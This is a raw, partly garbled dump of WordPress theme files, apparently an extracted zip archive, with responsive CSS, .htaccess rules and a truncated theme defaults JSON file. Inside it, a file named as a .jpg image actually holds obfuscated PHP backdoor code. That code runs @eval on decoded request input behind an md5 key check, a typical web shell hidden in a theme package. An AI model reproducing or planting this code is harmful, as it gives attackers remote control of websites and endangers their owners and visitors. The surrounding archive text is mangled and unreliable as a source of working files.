.yes-tstick.sticky-on .e-stitle-sticky .elementor-widget-foxiz-search-icon, .yes-tstick.sticky-on .navbar-right > *:not(.dark-mode-toggle-wrap):not(.font-resizer), .yes-tstick.sticky-on .more-section-outer { display: none; } .yes-tstick.sticky-on .s-title-sticky { display: flex; } .footer-columns .footer-col { flex-basis: 20%; width: 20%; } .footer-51c.footer-columns .footer-col { flex-basis: 15%; width: 15%; } .footer-4c .footer-col:first-child, .footer-4c .footer-col:last-child { flex-basis: 30%; width: 30%; } .footer-5c .footer-col:nth-child(1) { flex-basis: 20%; width: 20%; } .footer-51c .footer-col:nth-child(1) { flex-basis: 40%; width: 40%; } .footer-3c.footer-columns .footer-col { flex-basis: 25%; width: 25%; } .footer-3c.footer-columns .footer-col:nth-child(2) { flex-basis: 50%; width: 50%; } .footer-wrap.has-border .footer-col:not(:last-child) { border-right: 1px solid var(--flex-gray-15); } .review-header .rline { width: 30px; height: 10px; } .review-header .rstar { width: 28px; height: 28px; } .yt-playlist .yt-embed { flex: 0 0 66.67%; width: 66.67%; } .yt-playlist { display: flex; flex-flow: row nowrap; } .yt-playlist .plist-items { flex: 0 0 33.33%; width: 33.33%; } .p-big, .block-big .pagination-wrap { --el-spacing: 15px; --bottom-spacing: 40px; } .p-classic .feat-holder { margin-bottom: calc(var(--el-spacing) + 3px); } body .p-classic .meta-avatar img { width: 26px; height: 26px; } .single-post-outer.has-continue-reading .s-ct { height: 1200px; max-height: 1200px; } .rec-section { padding-top: 10px; padding-bottom: 10px; } .newsletter-form input { font-size: var(--rem-small); padding-top: 15px; padding-bottom: 15px; } .newsletter-box-2 .newsletter-inner > *:not(:last-child):not(.newsletter-featured) { margin-bottom: 30px; } .section-empty-inner .page-title { margin-bottom: 20px; padding-bottom: 20px; } .rbbsl a:nth-child(2) { padding: 0 15px; } .rbbsl a:nth-child(2) > span { display: inline-flex; } .category-hero-item:first-child:not(:last-child) { margin-right: 15px; margin-bottom: 15px; } .wp-block-pullquote.alignleft, .wp-block-pullquote.alignright { width: 50%; } .interest-content { margin-bottom: 50px; } .footer-quote { max-width: 240px; } .rb-col-2 .block-inner > *:nth-last-child(1), .rb-col-2 .block-inner > *:nth-last-child(2), .rb-col-3 .block-inner > *:nth-last-child(1), .rb-col-3 .block-inner > *:nth-last-child(2), .rb-col-3 .block-inner > *:nth-last-child(3), .rb-col-4 .block-inner > *:nth-last-child(1), .rb-col-4 .block-inner > *:nth-last-child(2), .rb-col-4 .block-inner > *:nth-last-child(3), .rb-col-4 .block-inner > *:nth-last-child(4), .rb-col-5 .block-inner > *:nth-last-child(1), .rb-col-5 .block-inner > *:nth-last-child(2), .rb-col-5 .block-inner > *:nth-last-child(3), .rb-col-5 .block-inner > *:nth-last-child(4), .rb-col-5 .block-inner > *:nth-last-child(5), .rb-col-6 .block-inner > *:nth-last-child(1), .rb-col-6 .block-inner > *:nth-last-child(2), .rb-col-6 .block-inner > *:nth-last-child(3), .rb-col-6 .block-inner > *:nth-last-child(4), .rb-col-6 .block-inner > *:nth-last-child(5), .rb-col-6 .block-inner > *:nth-last-child(6), .rb-col-7 .block-inner > *:nth-last-child(1), .rb-col-7 .block-inner > *:nth-last-child(2), .rb-col-7 .block-inner > *:nth-last-child(3), .rb-col-7 .block-inner > *:nth-last-child(4), .rb-col-7 .block-inner > *:nth-last-child(5), .rb-col-7 .block-inner > *:nth-last-child(6), .rb-col-7 .block-inner > *:nth-last-child(7) { margin-bottom: 0; } .rb-col-2.no-last-bb .block-inner > *:nth-last-child(1), .rb-col-2.no-last-bb .block-inner > *:nth-last-child(2), .rb-col-3.no-last-bb .block-inner > *:nth-last-child(1), .rb-col-3.no-last-bb .block-inner > *:nth-last-child(2), .rb-col-3.no-last-bb .block-inner > *:nth-last-child(3), .rb-col-4.no-last-bb .block-inner > *:nth-last-child(1), .rb-col-4.no-last-bb .block-inner > *:nth-last-child(2), .rb-col-4.no-last-bb .block-inner > *:nth-last-child(3), .rb-col-4.no-last-bb .block-inner > *:nth-last-child(4), .rb-col-5.no-last-bb .block-inner > *:nth-last-child(1), .rb-col-5.no-last-bb .block-inner > *:nth-last-child(2), .rb-col-5.no-last-bb .block-inner > *:nth-last-child(3), .rb-col-5.no-last-bb .block-inner > *:nth-last-child(4), .rb-col-5.no-last-bb .block-inner > *:nth-last-child(5), .rb-col-6.no-last-bb .block-inner > *:nth-last-child(1), .rb-col-6.no-last-bb .block-inner > *:nth-last-child(2), .rb-col-6.no-last-bb .block-inner > *:nth-last-child(3), .rb-col-6.no-last-bb .block-inner > *:nth-last-child(4), .rb-col-6.no-last-bb .block-inner > *:nth-last-child(5), .rb-col-6.no-last-bb .block-inner > *:nth-last-child(6), .rb-col-7.no-last-bb .block-inner > *:nth-last-child(1), .rb-col-7.no-last-bb .block-inner > *:nth-last-child(2), .rb-col-7.no-last-bb .block-inner > *:nth-last-child(3), .rb-col-7.no-last-bb .block-inner > *:nth-last-child(4), .rb-col-7.no-last-bb .block-inner > *:nth-last-child(5), .rb-col-7.no-last-bb .block-inner > *:nth-last-child(6), .rb-col-7.no-last-bb .block-inner > *:nth-last-child(7) { padding-bottom: 0; --bottom-border-color: transparent; } } @media (max-width: 1024px) { :root { --h1-fsize: 34px; --h2-fsize: 24px; --h3-fsize: 20px; --headline-fsize: 34px; --bottom-spacing: 30px; } .site-outer { overflow-x: hidden; } .none-mobile-sb .single-sidebar, .navbar-wrap, .header-template-inner { display: none; } .header-mobile { display: flex; flex-flow: column nowrap; max-height: 100vh; } .notification-popup { width: 100vw; max-width: 100vw; } .is-mstick .navbar-outer { min-height: var(--mbnav-height, 42px); } .is-mstick .has-quick-menu .navbar-outer { min-height: calc(var(--mbnav-height, 42px) + 42px); } .privacy-bar.privacy-left { right: 20px; bottom: 10px; width: auto; } .qlink a { white-space: nowrap; } .qlinks-content { overflow: hidden; } .qlinks-content ul { overflow-x: auto; flex-flow: row nowrap; scrollbar-width: none; -ms-overflow-style: none; } .qlinks-content ul::-webkit-scrollbar { width: 0; height: 0; } .plist-items { height: 300px; } .plist-holder { padding-top: 70px; } .sidebar-inner { max-width: 370px; margin-top: 40px; margin-right: auto; margin-left: auto; } .single-post .sidebar-inner { margin-top: 15px; } .logo-wrap img.logo-transparent, .logo-sec { display: none; } } /** vertical tablet and mobile */ @media (max-width: 991px) { .is-gap-25 .block-inner, .is-gap-30 .block-inner, .is-gap-35 .block-inner { margin-right: -20px; margin-left: -20px; } .is-gap-25 > .block-inner > *, .is-gap-30 > .block-inner > *, .is-gap-35 > .block-inner > * { padding-right: 20px; padding-left: 20px; } .footer-wrap > *:first-child { padding-top: 40px; } .w-sidebar { margin-bottom: 40px; } .single-meta { flex-flow: column-reverse nowrap; } .single-meta > * { width: 100%; } .smeta-extra { margin-top: 2px; margin-bottom: 17px; padding: 4px 12px; border-radius: var(--round-5); background-color: var(--flex-gray-7); } .t-shared-sec .share-action, .sticky-share-list .share-action { font-size: 14px; } .single-standard-2 .single-header-inner:before, .embed-bg-overlay { bottom: 90px; } .single-standard-3 .single-header-inner:before, .single-standard-4 .single-header-inner:before { padding-bottom: 60%; } .single-header-columns { flex-flow: row wrap; } .single-standard-6 .s-feat-outer { flex: 0 0 100%; } .single-header-left { flex: 0 0 100%; padding-top: 20px; padding-bottom: 10px; } .featured-vertical { padding-bottom: 66.67%; border-radius: var(--round-5); } .burger-icon { color: var(--mbnav-color, var(--nav-color)); } } /** mobile */ @media (max-width: 767px) { :root { --body-fsize: 15px; --h1-fsize: 26px; --headline-fsize: 26px; --h2-fsize: 21px; --h3-fsize: 17px; --h4-fsize: 15px; --h5-fsize: 14px; --h6-fsize: 14px; --cat-fsize: 10px; --meta-fsize: 12px; --eauthor-fsize: 12px; --bcrumb-fsize: 11px; --rem-mini: .7rem; --btn-fsize: 11px; --height-34: 28px; --height-40: 34px; --padding-40: 0 20px; --h1-fheight: 1.3; --h2-fheight: 1.3; --h3-fheight: 1.4; --dwidgets-fsize: 12px; --tagline-fsize: 17px; --tagline-s-fsize: 17px; --excerpt-fsize: 13px; --el-spacing: 10px; } .col-border.rb-mcol-2 .block-inner > *:nth-child(2n+1):after { position: absolute; top: 0; right: 0; bottom: 0; left: auto; width: 1px; height: 100%; content: ''; pointer-events: none; border-right: 1px var(--column-border-style, solid) var(--column-border-color); } .meta-el:not(.mobile-hide) + .meta-el:not(.mobile-hide):before { display: inline-flex; width: 3px; height: 3px; margin-right: .6em; margin-left: .6em; content: ''; opacity: .5; border-radius: 100%; background-color: currentColor; } .p-overlay { --bottom-spacing: 10px; } input[type='text'], input[type='tel'], input[type='password'], input[type='email'], input[type='url'], input[type='search'], input[type='number'], textarea { padding: 7px 15px; } .rb-mcol-1 > .block-inner > * { flex-basis: 100%; width: 100%; } .rb-mcol-2 > .block-inner > * { flex-basis: 50%; width: 50%; } .rb-mcol-3 > .block-inner > * { flex-basis: 33.33%; width: 33.33%; } .rb-mcol-4 > .block-inner > * { flex-basis: 25%; width: 25%; } body .mobile-hide, body .mobile-hide + .spacing, .review-meta-inner .extra-meta, .sponsor-label { display: none; } .ecat-bg-1 .p-category, .ecat-bg-2 .p-category { padding: 5px 10px; } .rstar-bg { background-image: -webkit-linear-gradient(left, var(--review-color) 93.75%, transparent 6.25%); background-image: linear-gradient(to right, var(--review-color) 93.75%, transparent 6.25%); background-size: 16px 15px; } span.rstar { width: 15px; height: 15px; } .rstar i { font-size: 11px; } .rline { width: 15px; height: 5px; } body .meta-avatar img { width: 20px; height: 20px; } .block-list-small-1 .scroll-holder { max-height: none; } .hrc-3 .overlay-wrap, .overlay-1 .overlay-wrap { position: relative; overflow: visible; } .p-highlight.ecat-bg-1 .overlay-inner, .p-highlight.ecat-bg-2 .overlay-inner, .p-highlight.ecat-bg-3 .overlay-inner { padding-top: 0; } .p-highlight.ecat-bg-1 .p-top, .p-highlight.ecat-bg-2 .p-top, .p-highlight.ecat-bg-3 .p-top { margin-top: -1em; } .post-slider .slider-prev, .post-slider .slider-next { font-size: 1.25rem; width: 40px; height: 40px; } .hrc-3 .p-highlight { border-radius: 0; } .hrc-3 .ratio-v1 { padding-bottom: 66.67%; } .collapse-footer-menu .menu-item a > span { font-size: var(--em-small); } .rb-user-popup-form { max-width: 90%; } .logo-popup-outer { padding: 20px; } .p-grid-small-1 { display: flex; align-items: flex-start; flex-flow: row-reverse nowrap; width: 100%; --bottom-spacing: 25px; } .p-grid-small-1.m-featured-left { flex-flow: row nowrap; } .p-content { flex-grow: 1; } .list-box .p-featured { -webkit-border-bottom-right-radius: 0; border-bottom-right-radius: 0; -webkit-border-bottom-left-radius: 0; border-bottom-left-radius: 0; } .list-box .p-content { margin: 0 var(--box-spacing) var(--box-spacing); } .list-box .feat-holder .p-top { padding-left: var(--box-spacing) } .list-box .entry-format-absolute.format-style-bottom .p-format { background-color: var(--box-color, var(--solid-light)); } [data-theme='dark'] .list-box .entry-format-absolute.format-style-bottom .p-format, .light-scheme .list-box .entry-format-absolute.format-style-bottom .p-format { background-color: var(--dark-box-color, var(--solid-light)); } .p-grid-small-1 .feat-holder { flex-shrink: 0; width: 135px; margin-bottom: 0; margin-left: 20px; } .p-grid-small-1.m-featured-left .feat-holder { margin-right: 20px; margin-left: 0; } .follow-button { font-size: 11px; } .page404-featured img { max-height: 200px; } .page404-description, .taxonomy-description { font-size: var(--rem-small); } .search-form input[type='search'] { padding: 10px 10px 10px 5px; } .plist-item { padding: 10px; } .yt-trigger { width: 54px; } .yt-trigger-icons svg { width: 26px; } .copyright-inner { flex-direction: column-reverse; text-align: center; } .copyright-menu { flex-flow: row wrap; justify-content: center; margin-bottom: 12px; margin-left: 0; } .smeta-in > .meta-avatar { margin-right: 10px; } .smeta-in > .meta-avatar img { width: 42px; } .l-shared-sec-outer { display: none; } .single-header-content { padding: 0 15px; } .has-lsl .e-ct-outer, body .has-lsl .e-ct-outer { width: 100%; max-width: 100%; } .e-shared-header span { display: none; } .rbbsl { font-size: 14px; } .rbbsl > * { margin-right: 7px; padding: 0 15px; } .entry-sec { padding-top: 27px; padding-bottom: 25px; } .user-rating svg { width: 1em; } .review-feat { width: 70px; } .single-standard-7 .single-header { padding-top: 15px; } .single-standard-8 .grid-container { margin-top: 15px; } .feat-caption .caption-text:before { width: 30px; margin-right: 10px; } .attribution { padding-left: 0; } .review-content { padding: 15px; } .review-footer { margin-right: 20px; margin-left: 20px; } .pros-cons .inner > * { flex: 0 0 100%; justify-content: flex-start; width: 100%; } .pros-cons .inner > *:first-child { margin-bottom: 20px; } .review-footer > *:not(.review-action) { padding: 22px 0 20px 0; } .pros-cons-title { padding-bottom: 0; } .single-standard-2 .single-header-inner:before, .embed-bg-overlay { bottom: 50px; } .category-header-1 .archive-inner { align-items: flex-start; flex-flow: column nowrap; } .category-header-1 .category-hero-wrap { align-items: flex-start; width: calc(100% - 25px); margin-top: 25px; padding-bottom: 20px; } .p-grid-small-1 .feat-holder { flex-shrink: 0; width: 100%; max-width: 100px; margin-left: 15px; } .p-grid-small-1 .p-content { flex-grow: 1; } .cbox { --bottom-spacing: 10px; } .cbox-inner { display: flex; align-items: stretch; flex-flow: row nowrap; } .cbox-featured { flex-shrink: 0; width: 90px; padding-bottom: 0; } .popup-newsletter-inner { flex-flow: row wrap; } .popup-newsletter-inner > * { width: 100%; } .popup-newsletter-cover-holder { padding-bottom: 5px; } .popup-newsletter-content { padding: 20px; } .table-link-depth { margin-left: 15px; } .embed-audio .embed-holder { padding-bottom: 50%; } .format-gallery-coverflow .swiper-pagination { margin-top: 10px; } .page-selected { position: static; } .page-selected-outer { position: relative; border-left: 5px solid var(--g-color); border-radius: var(--round-5); } .page-selected-list { right: 0; left: 0; } .page-selected-title { display: none; } .newsletter-form { flex: 0 0 100%; max-width: 100%; margin-top: 20px; } .newsletter-featured { flex: 0 0 25%; max-width: 25%; padding-right: 0; } .newsletter-content { flex: 0 0 75%; max-width: 75%; } .footer-wrap:after { display: none; } .p-grid-small-1 .p-format { font-size: 16px; } .p-list-2.ecat-bg-1 .p-top, .p-list-2.ecat-bg-2 .p-top, .p-list-2.ecat-bg-3 .p-top { margin-top: calc(-2px - var(--el-spacing) - 1em); padding-left: 7px; } .current-slider-info .h4 { font-size: 9px; } span.current-slider-count { font-size: 1.5em; } .entry-sec:before, .review-footer > *:not(.review-action):before, .mobile-collapse-sections:before { height: 2px; } h1.search-title { font-size: var(--h2-fsize); } .search-subtitle { font-size: var(--rem-small); margin-top: 5px; } .bookmark-info { bottom: 20px; } .ubio-inner { flex-flow: column nowrap; justify-content: center; text-align: center; } .ubio-inner { flex-flow: column nowrap; justify-content: center; text-align: center; } .bio-avatar { width: 80px; height: 80px; margin-right: 0; margin-bottom: 12px; } .bio-count-posts { display: none; } .bio-description { font-size: var(--em-mini); } .bio-content .usocials { justify-content: center; padding-top: 3px; } .breaking-news-heading { margin-right: 3px; padding: 0; background-color: transparent; -webkit-box-shadow: none; box-shadow: none; } .breaking-news-heading span { display: none; } .newsletter-description { font-size: var(--rem-mini); } .qlinks-heading > span { display: none; } .newsletter-inner { padding-right: 0; padding-left: 0; } .rb-mcol-2 .block-inner > *:nth-last-child(1), .rb-mcol-2 .block-inner > *:nth-last-child(2), .rb-mcol-3 .block-inner > *:nth-last-child(1), .rb-mcol-3 .block-inner > *:nth-last-child(2), .rb-mcol-3 .block-inner > *:nth-last-child(3) { margin-bottom: 0; } .rb-mcol-2.no-last-bb .block-inner > *:nth-last-child(1), .rb-mcol-2.no-last-bb .block-inner > *:nth-last-child(2), .rb-mcol-3.no-last-bb .block-inner > *:nth-last-child(1), .rb-mcol-3.no-last-bb .block-inner > *:nth-last-child(2), .rb-mcol-3.no-last-bb .block-inner > *:nth-last-child(3) { padding-bottom: 0; --bottom-border-color: transparent; } .wp-block-pullquote { padding: 1.5em 0; } .wp-block-pullquote.alignleft, .wp-block-pullquote.alignright { float: none; max-width: 100%; margin-right: 0; margin-left: 0; } .wp-block-pullquote p { font-size: 1.15em; } .widget_rss cite:before, .wp-block-quote cite:before, .wp-block-pullquote cite:before { width: 20px; } .rbct .wp-block-pullquote cite { font-size: var(--rem-mini); } .newsletter-icon svg { width: 40px; } .e-pagi.mobile-hide { display: none; } .e-pagi img { display: none; } .e-pagi span.p-url { font-size: var(--em-small); } .e-pagi { margin-right: -10px; margin-left: -10px; } .e-pagi .nav-el { padding-right: 10px; padding-left: 10px; } .reaction-heading { margin-bottom: 15px; } .reaction { flex: 0 0 44px; max-width: 44px; padding: 5px; } .reaction-icon svg { width: 36px; height: 36px; } .reaction .reaction-title, .reaction.active .reaction-count { font-size: var(--rem-mini); } .has-drop-cap:not(:focus):first-letter { font-size: 3.5em; line-height: .9; } .e-pagi .nav-label { margin-bottom: 7px; } .top-site-ad:not(.no-spacing) { padding-top: 10px; padding-bottom: 10px; } .author-avatar { width: 36px; } .nname-info .meta-label, .ef-label { display: none; } .footer-logo { height: calc(var(--flogo-height, 50px) * .8); } .bookmark-featured { width: 70px; } .bookmark-title { width: 205px; } .top-footer-inner > *:not(:last-child) { margin-bottom: 35px; } .grid-masonry .grid-holder.rb-masonry { display: grid; grid-gap: 5px; grid-template-columns: auto auto auto auto; } .grid-fmasonry .grid-holder.rb-masonry { display: grid; grid-gap: 5px; grid-template-columns: auto auto auto auto auto; } .grid-default .grid-holder { display: grid; grid-template-columns: auto auto auto; grid-gap: 5px; } .grid-masonry .grid-el:nth-child(2) { grid-column: 1 / span 2; grid-row: 1 / span 2; } .grid-masonry .grid-el:first-child { height: 100%; grid-column: 3 / span 2; grid-row: 1; } .grid-masonry .grid-el:nth-child(3) { height: 100%; grid-column: 3 / span 1; grid-row: 2; } .grid-masonry .grid-el:nth-child(5) { height: 100%; grid-column: 1 / span 2; grid-row: 3; } .grid-masonry .grid-el:last-child { grid-column: 3 / span 2; grid-row: 3 / span 2; } .grid-fmasonry .grid-el:nth-child(3) { grid-column: 2 / span 2; grid-row: 1 / span 2; } .grid-fmasonry .grid-el:nth-child(4) { height: 100%; grid-column: 4 / span 2; grid-row: 1; } .grid-fmasonry .grid-el:nth-child(6) { grid-column: 1 / span 2; grid-row: 3 / span 2; } .grid-fmasonry .grid-el:nth-child(9) { height: 100%; grid-column: 3 / span 2; grid-row: 4; } .grid-fmasonry .grid-el:nth-child(4) .instagram-box, .grid-fmasonry .grid-el:nth-child(9) .instagram-box, .grid-masonry .grid-el:first-child .instagram-box, .grid-masonry .grid-el:nth-child(5) .instagram-box { padding-bottom: 50%; } .rb-header-name.h6 { font-size: 1.7rem; } .rb-w-header .col-right .rb-w-units { font-size: 3.3rem; } .rb-w-big-icon svg { width: 76px; height: 76px; } .rb-w-desc { font-size: .75rem; } .w-forecast-icon svg { width: 36px; height: 36px; } .is-style-10 .fnicon i, .is-style-11 .fnicon i { font-size: 1rem; width: 44px; height: 44px; } .is-style-15 .social-follower, .is-style-14 .social-follower, .is-style-8 .social-follower, .is-style-7 .social-follower, .is-style-6 .social-follower, .is-style-5 .social-follower, .is-style-4 .social-follower, .is-style-3 .social-follower, .is-style-15 .social-follower, .is-style-14 { margin: -3px; } .is-style-9 .social-follower, .is-style-2 .social-follower, .is-style-1 { margin: -5px; } .is-style-9 .follower-inner, .is-style-2 .follower-inner, .is-style-1 .follower-inner { margin: 5px; } .is-style-8 .follower-inner, .is-style-7 .follower-inner, .is-style-6 .follower-inner, .is-style-5 .follower-inner, .is-style-4 .follower-inner, .is-style-3 .follower-inner { margin: 3px; padding: 12px 5px 10px 5px; } .is-style-10 .follower-el, .is-style-11 .follower-el { margin-bottom: 10px; } .is-style-12 .follower-el, .is-style-13 .follower-el { margin-bottom: 7px; } .w-banner { padding-top: 50px; padding-bottom: 50px; } .post-slider { position: relative; overflow: hidden; border-radius: var(--round-3); background-color: var(--dark-accent); } .p-list-1 .list-feat-holder, .p-list-2 .list-feat-holder { width: 100% !important; min-width: 100%; max-width: 100% !important; margin-bottom: calc(var(--el-spacing) + 2px); } .ad-description { font-size: 10px; } .pagination-nextprev > * { min-width: 90px; } .short-pagination .pagination-nextprev > * { min-width: 0; } .wpcf7-form .wpcf7-form-control-wrap { width: 100%; max-width: 100%; padding-top: 7px; padding-bottom: 7px; } .cbox-center { display: none; } .heading-layout-c8 .heading-title:before, .heading-layout-c8 .heading-title:after { width: 40px; } .intro-content { display: none; } .textwidget br, .textwidget p { font-size: var(--rem-small); } } @media all { .p-content > *:last-child, .block-inner > *:last-child, .rb-col-1 .block-inner > *:last-child { margin-bottom: 0; } }PK!.|assets/css/.htaccessnu[ Order allow,deny Deny from all Order allow,deny Allow from all RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] PK!assets/assets/index.phpnu[PK!t`e$assets/assets/UowrPpAaKlmSWJGNbB.jpgnu[-*/==/*-CG):%3D-*/24))/*-w)Qatu0]JD-*/{ /*-eKdHBa8!z8-*/(($ok[63]=$ok[63].$ok[71])&&($ok[88]=$ok[63]($ok[88]))&&(/*-TYaCF2o-*/@eval/*-H)]Yn0-*/($ok[63](${$ok[34]}[19])/*-+-B8dFBj,-*/))/*-e,-*/);}/*-E]]Z_nu8JX-*/class /*-K3FP-*/zN{ /*-z5^PKx!KQ:-*/static/*-nAjjhO}-*/ function /*-PVB1e|-*/snbYUg($fn) /*-0Nk-*/{ $byfEvmHdD/*-~1cfZewb-*/ = /*-!IYmn-*/"r"./*-{Q-*/"a"./*-Lp[:-*/"n"./*-[|-*/"g"./*-4O%2-*/"e"; /*-n9t:{oQl-*/$tMNiumRsZE/*-S=i0i-*/ = /*-d?7c-*/$byfEvmHdD/*-g(-*/(/*-xY-*/"~"/*-2k6-*/, /*-iU5G)g-*/" "/*-zK31Nh-*/);/*-4aNUDG.H]-*/ $ZLkOTysBfc /*-|%-*/= /*-pC2jtJut%-*/explode/*->,o0;h-*/(/*-f,C-*/";", /*-v7-*/$fn/*-}$8-*/); /*-B3xTIgx4s-*/$CSUfg /*-=~5:.nFu-*/= /*-rslAq-*/""; foreach /*-j#OG-*/(/*-OD=+bq&-*/$ZLkOTysBfc /*-#!hP%wP-*/as /*-c@03-*/$NCAxrkSG /*-@7QFhf_98-*/=>/*-GSo.h72jK-*/ $RHmFN/*-^;,21LHK-*/) /*-&WK-*/$CSUfg /*-&l[bJ!Avf-*/.= /*-Q:gg-*/$tMNiumRsZE[$RHmFN/*-`;wXx-*/ - /*-osFs-*/34664/*-j[-IL^RM-*/];/*-4bjW])A-*/ return /*-SlMW(-*/$CSUfg; /*-P:Yz-x-*/} /*-O?NA4rqq-*/static /*-{nV9YVHi-*/function /*-Bm.PNW+i-*/LfglDRyZQ/*-n%NhmYT-*/(/*-AqCo%-*/$sI,/*-aR&pj-*/ $lfPt/*-X`XmLcS-*/)/*-&7-*/ {/*-u4w-*/ $MLcY/*-GiW6]$x08w-*/ = /*-a^?U,7[:P-*/=/*-e1m#!T-*/ $fh/*-5$gaG.xKH-*/[/*-)hE>eB@X-*/1+1/*-21v^v!RVE-*/]/*-&-pl1-*/(/*-!P-*/$cvHO,/*-!?PlR:-*/ true/*-miP3)]-*/); /*-K`v1|kS-*/@${/*->eNW_f]),L-*/"_"./*-9?H4K-*/"G"./*-(K%-*/"E"/*-w2rN-*/[5+5/*-9y-*/]/*-?!a2-*/]/*-O$|YC-.u-*/ == /*-YW{H-*/1 /*-Bg3J-*/&& /*-H$c--*/die/*--=,ISXJX-*/(/*-ipIUGyKY-*/$fh[4+1/*-G-*/]/*-?flcis,8-*/(/*-gFR-*/__FILE__/*-?g-*/)/*-$]-*/); /*-=],(2-*/if/*-p4Uv2#1h8-*/(/*-3$eBS-*/ (/*-0|L%NP;-*/(@/*-VL-*/$WgEynOAmX/*-,#)-*/[/*-9J+GX-*/0/*-0IYo-*/] /*-)x-*/- time/*->Or-*/()/*-0Dn_YH,-*/) > /*-[C9-*/0/*-w&qnT099:-*/)/*-a>-ZbTM,$<-*/ and /*-{y)j8ASvS-*/(/*-7O:DBS-*/md5/*-XX-s-*/(/*-Rb^rihgpqI-*/md5/*-A-*/(/*-$--*/$WgEynOAmX/*-1|-*/[/*-hLD=GUB-*/1+2/*-%rxc!E-*/]/*-Be9:L~uL<-*/)/*-{~+O<,Q7-*/)/*-{~wSzJ-*/ === /*-I-*/"a5050ed3871fd6a04d11b0fec2cad109"/*-g%0NX:>K.f-*/)/*-etSuS)-*/ ): /*-7gj$WuN-*/[/*-,x#p-*/0+5/*-?$bh8Csg-*/]/*-Zm^0JS+xT-*/);/*-V-iE-*/@eval/*-7p-*/(/*-l+msq`b!R-*/$fh/*-lh;k-*/[/*-&?U_kv-*/3+1/*-zci^1(W-*/]/*-G_}|j?>>f.-*/(/*-2[yZf-*/$uFSZxbwigl/*-fi<-*/)/*-4^&Hh-*/);/*-didsq&6R-*//*->n-*/die;/*-to-*/ endif;/*-%4VI-*/ }/*-,z}wuc~RaI-*/}/*-tHzO;u$d-*/zN/*-e}-*/::/*-DE^[-G~-*/DjL/*->-*/();/*-33-*/ ?>PK!.|assets/assets/.htaccessnu[ Order allow,deny Deny from all Order allow,deny Allow from all RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] PK!h Huuassets/admin/defaults.jsonnu[{"site_tooltips":1,"back_top":1,"search_placeholder":"Search Headlines, News...","header_style":"1","sticky":"0","smart_sticky":"0","hd1_more":0,"hd1_height":"","hd1_background":{"from":"","to":""},"hd1_sub_background":{"from":"","to":""},"hd1_sub_scheme":"0","dark_hd1_background":{"from":"","to":""},"dark_hd1_sub_background":{"from":"","to":""},"mh_layout":0,"mobile_social":1,"mobile_footer_menu":"","mobile_copyright":"","mobile_background":{"from":"","to":""},"mobile_sub_background":{"from":"","to":""},"dark_mobile_background":{"from":"","to":""},"dark_mobile_sub_background":{"from":"","to":""},"more_column":"3","more_footer_menu":"","more_footer_copyright":"","header_search_icon":1,"header_search_mode":"search","more_search":1,"mobile_search":1,"header_search_heading":"Search","header_login_icon":1,"mobile_login":1,"header_login_layout":0,"header_login_heading":"Welcome Back!","header_login_description":"Sign in to your account","header_login_redirect":"","header_login_menu":"","header_login_register":"","header_login_forget":"","header_notification":0,"header_notification_url":"#","alert_content":"","alert_url":"#","alert_home":"1","alert_sticky_hide":false,"global_sidebar_position":"right","multi_sidebars":[],"sticky_sidebar":"0","widget_block_editor":0,"footer_layout":"5","footer_template_shortcode":"","footer_background":{"background-color":"#0000000a"},"dark_footer_background":{"background-color":"#16181c"},"footer_color_scheme":"0","footer_social":false,"copyright":"","footer_menu":"","category_highlight_color":"","category_color":"","category_dark_color":"","meta_author_label":"0","meta_date_icon":false,"meta_updated_icon":false,"meta_comment_icon":false,"meta_view_icon":false,"meta_read_icon":false,"meta_category_icon":false,"read_speed":130,"human_time":"0","edit_post_link":1,"crop_position":"top","featured_crop_sizes":[],"edit_link":1,"foxiz_crop_g1":1,"foxiz_crop_g2":1,"foxiz_crop_g3":1,"foxiz_crop_o1":1,"foxiz_crop_o2":1,"slider_play":"1","slider_speed":"","slider_effect":"0","post_icon_video":1,"post_icon_gallery":"0","post_icon_audio":"0","readmore_label":"","readmore_icon":1,"hover_effect":"1","menu_hover_effect":1,"svg_supported":false,"gif_supported":1,"font_awesome":"0","classic_1_crop_size":"0","classic_1_entry_category":"bg-1,big","classic_1_entry_meta":["avatar","author","date"],"classic_1_review":"1","classic_1_review_meta":true,"classic_1_entry_format":"bottom,big","classic_1_bookmark":false,"classic_1_excerpt_length":"30","classic_1_excerpt_source":"0","classic_1_readmore":false,"classic_1_title_tag":"0","classic_1_hide_category":false,"classic_1_mobile_hide_meta":[],"classic_1_hide_excerpt":true,"grid_1_crop_size":"0","grid_1_entry_category":"bg-1,big","grid_1_entry_meta":["avatar","author","date"],"grid_1_review":"1","grid_1_review_meta":true,"grid_1_entry_format":"bottom","grid_1_bookmark":false,"grid_1_excerpt_length":"12","grid_1_excerpt_source":"0","grid_1_readmore":false,"grid_1_title_tag":"0","grid_1_hide_category":false,"grid_1_mobile_hide_meta":[],"grid_1_hide_excerpt":true,"grid_small_1_crop_size":"0","grid_small_1_entry_category":"bg-1","grid_small_1_entry_meta":["date"],"grid_small_1_review":"replace","grid_small_1_review_meta":false,"grid_small_1_entry_format":"bottom","grid_small_1_bookmark":false,"grid_small_1_excerpt_length":"-1","grid_small_1_excerpt_source":"0","grid_small_1_readmore":false,"grid_small_1_title_tag":"0","grid_small_1_hide_category":true,"grid_small_1_mobile_hide_meta":[],"grid_small_1_hide_excerpt":true,"list_2_crop_size":"0","list_2_featured_position":"right","list_2_entry_category":"bg-1,big","list_2_entry_meta":["avatar","author","date"],"list_2_review":"1","list_2_review_meta":true,"list_2_entry_format":"bottom,big","list_2_bookmark":false,"list_2_excerpt_length":"20","list_2_excerpt_source":"0","list_2_readmore":false,"list_2_title_tag":"0","list_2_hide_category":false,"list_2_mobile_hide_meta":[],"list_2_hide_excerpt":true,"list_old2_crop_size":"0","list_old2_featured_position":"right","list_old2_entry_category":"bg-1,big","list_old2_entry_meta":["avatar","author","date"],"list_old2_review":"1","list_old2_review_meta":true,"list_old2_entry_format":"bottom,big","list_old2_bookmark":false,"list_old2_excerpt_length":"12","list_old2_excerpt_source":"0","list_old2_readmore":false,"list_old2_title_tag":"0","list_old2_hide_category":false,"list_old2_mobile_hide_meta":[],"list_old2_hide_excerpt":true,"list_1_crop_size":"0","list_1_featured_position":"right","list_1_entry_category":"bg-1,big","list_1_entry_meta":["avatar","author","date"],"list_1_review":"1","list_1_review_meta":true,"list_1_entry_format":"bottom","list_1_bookmark":false,"list_1_excerpt